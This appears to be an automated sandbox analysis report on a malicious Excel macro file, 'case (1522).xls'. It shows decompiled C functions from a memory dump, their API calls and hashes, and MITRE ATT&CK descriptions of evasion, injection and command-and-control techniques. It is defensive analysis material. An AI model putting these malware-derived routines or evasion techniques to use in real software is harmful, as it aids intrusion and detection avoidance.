Function 000929D0, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000929D0(void* __eax, struct HWND__* _a4) {
				int _v20;
				signed int _t14;
				struct HDC__* _t21;
				signed int _t26;
				signed int _t28;
				long _t29;
				void* _t32;
				struct HWND__* _t33;
				signed int _t37;
				signed int _t38;
				struct HDC__* _t40;
				struct HWND__* _t42;
				signed int _t43;
				void* _t44;
				void** _t46;

				_t33 = _a4;
				_t26 = _t33 + (_t33 & 0x00000004);
				_t40 = _t26 * 0x6e;
				DeleteDC(_t40);
				_t14 = _t33 * _t40 * _t26;
				_t42 = _t40 + _t14 ^ 0x00000191;
				if(_t33 == 0x191 || _t42 != _t33) {
					_t2 = (0x00000191 - _t42 & _t33) + 0x383; // 0x514
					SetWindowPos(_t42, _t33, 0x191, _t33, _t33, _t33, 0x191);
					_t14 = (_t2 | 0x00000383) * 0x383;
				}
				_v20 = _t14;
				_t43 = _t42 * _t14;
				_t4 = _t43 + 0x368; // -711115
				_t28 = _t4 - _t14;
				_t37 = _t28 ^ _t43;
				_t6 = _t43 + 0x368; // -710243
				_t44 = _t37 + _t6;
				ResetEvent(_t44);
				_t29 = _t28 ^ _t44;
				_t38 = _t37 | _t29;
				_t32 = _t38 & _t44;
				_t7 = _t32 + 0x31; // -711066
				_t21 = _t7 * _t44;
				_t46 = (_t21 + _t29) * _t38;
				CreateDIBSection(_t21, _t21, _v20, _t46, _t32, _t29);
				return _t46 * _t32;
			}

0x000929d7
0x000929df
0x000929e1
0x000929e5
0x000929f0
0x000929f5
0x00092a01
0x00092a17
0x00092a1f
0x00092a2b
0x00092a2b
0x00092a31
0x00092a34
0x00092a37
0x00092a3d
0x00092a41
0x00092a43
0x00092a43
0x00092a4b
0x00092a51
0x00092a53
0x00092a57
0x00092a59
0x00092a5c
0x00092a62
0x00092a6f
0x00092a81

APIs

DeleteDC.GDI32(-000ADD33), ref: 000929E5
SetWindowPos.USER32(-000ADD33,00097BEC,00000191,00097BEC,00097BEC,00097BEC,00000191), ref: 00092A1F
ResetEvent.KERNEL32(-000AD663,?,00097BEC,-000B1FA0,-03E11D33,-000B1D33,?,00099287,-000B1D33,?,000977A1,00000001,?,-000B1D33,?,00096A74), ref: 00092A4B
CreateDIBSection.GDI32(-000AD99A,-000AD99A,-000AD9CB,-000AD663,-000AD9CB,-000AD9CB), ref: 00092A6F

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: CreateDeleteEventResetSectionWindow
String ID:
API String ID: 201249963-0
Opcode ID: 3409eff8cf9416cd87beb010bacdbf8b4ae8af0e4800778182f601db0a6ec57f
Instruction ID: 56f4f18647e72d7b827c133b4484286b29c65badd572b00d73a90061db79f27f
Opcode Fuzzy Hash: 3409eff8cf9416cd87beb010bacdbf8b4ae8af0e4800778182f601db0a6ec57f
Instruction Fuzzy Hash: 4C11EB73B002247FE7248A5ADC49EDBBA5EE7C9710F060226F949DB150D575AF05C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 000ADA20, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000ADA20() {
				char _v28;
				void* _t4;

				_t4 = CreateEventW(0, 1, 0, E00097200(0xb05f8,  &_v28));
				if(_t4 != 0) {
					SetEvent(_t4);
					_t4 = CloseHandle(_t4);
				}
				SetLastError(0);
				return _t4;
			}

0x000ada3f
0x000ada47
0x000ada4c
0x000ada53
0x000ada53
0x000ada5b
0x000ada66

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0CD06773,?,-000B1D33,?,000991EB,-000B1D33,?,000977A1,00000001), ref: 000ADA3F
SetEvent.KERNEL32(00000000,?,?,0CD06773,?,-000B1D33,?,000991EB,-000B1D33,?,000977A1,00000001,?,-000B1D33,?,00096A74), ref: 000ADA4C
CloseHandle.KERNEL32(00000000), ref: 000ADA53
SetLastError.KERNEL32(00000000,?,?,0CD06773,?,-000B1D33,?,000991EB,-000B1D33,?,000977A1,00000001,?,-000B1D33,?,00096A74), ref: 000ADA5B

Memory Dump Source

Source File: 00000005.00000002.2361039209.0000000000090000.00000040.00000001.sdmp, Offset: 00090000, based on PE: true

Similarity

API ID: Event$CloseCreateErrorHandleLast
String ID:
API String ID: 2055590504-0
Opcode ID: f2e908e6812aa9bcd17f4081954baace572480927d5260a5a849c33e9e80e63c
Instruction ID: f02f903d2dd272a4138a7761e4e52e7b7db864338197488a3d1a01538f620e7e
Opcode Fuzzy Hash: f2e908e6812aa9bcd17f4081954baace572480927d5260a5a849c33e9e80e63c
Instruction Fuzzy Hash: 61E04FB2694204ABF65037E46C0AFEB3A7C9B04B42F440161FB0DD9181E6699454C7BA

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report case (1522).xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "case (1522).xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 145752

General

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 0233AE40, Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 372
injectionmemorythreadCOMMON

Function 0234DA20, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Function 0234D770, Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Function 0234B1B0, Relevance: 1.5, APIs: 1, Instructions: 23
memoryCOMMON

Function 023469A0, Relevance: 7.6, APIs: 5, Instructions: 65
threadprocessCOMMON

Function 0233D830, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280
libraryloaderCOMMON

Function 02331A00, Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Function 0234DA70, Relevance: .7, Instructions: 746
COMMONCrypto

Function 02345BF0, Relevance: .3, Instructions: 307
COMMONCrypto

Function 02333A30, Relevance: .1, Instructions: 149
COMMONCrypto

Function 02339A60, Relevance: .1, Instructions: 127
COMMONCrypto

Function 02348830, Relevance: .1, Instructions: 113
COMMON

Function 02339C60, Relevance: .1, Instructions: 95
COMMONCrypto

Function 0234CE40, Relevance: .0, Instructions: 36
COMMON

Function 02342EF0, Relevance: .0, Instructions: 2
COMMON

Function 023346E0, Relevance: 6.1, APIs: 4, Instructions: 134
COMMON

Function 023329D0, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Function 000A9C90, Relevance: 1.6, APIs: 1, Instructions: 107
COMMON

Function 00091AF0, Relevance: 1.6, APIs: 1, Instructions: 100
filenetworkCOMMON

Function 0009BA60, Relevance: 6.1, APIs: 4, Instructions: 107
registryCOMMON

Function 000ABAD0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188
networkCOMMON

Function 000A1E90, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114
COMMON

Function 0009BCD0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
COMMON

Function 000A8590, Relevance: 4.6, APIs: 3, Instructions: 128
COMMON

Function 0009A5E0, Relevance: 4.6, APIs: 3, Instructions: 100
filememoryCOMMON

Function 000A5420, Relevance: 4.6, APIs: 3, Instructions: 72
fileCOMMON

Function 0009ABF0, Relevance: 4.6, APIs: 3, Instructions: 59
registryCOMMON

Function 000A4680, Relevance: 3.7, APIs: 2, Instructions: 710
threadCOMMON

Function 000A3BC0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
COMMON

Function 000A5180, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
COMMON

Function 000A58D0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58
threadCOMMON

Function 000A9600, Relevance: 3.1, APIs: 2, Instructions: 93
fileCOMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre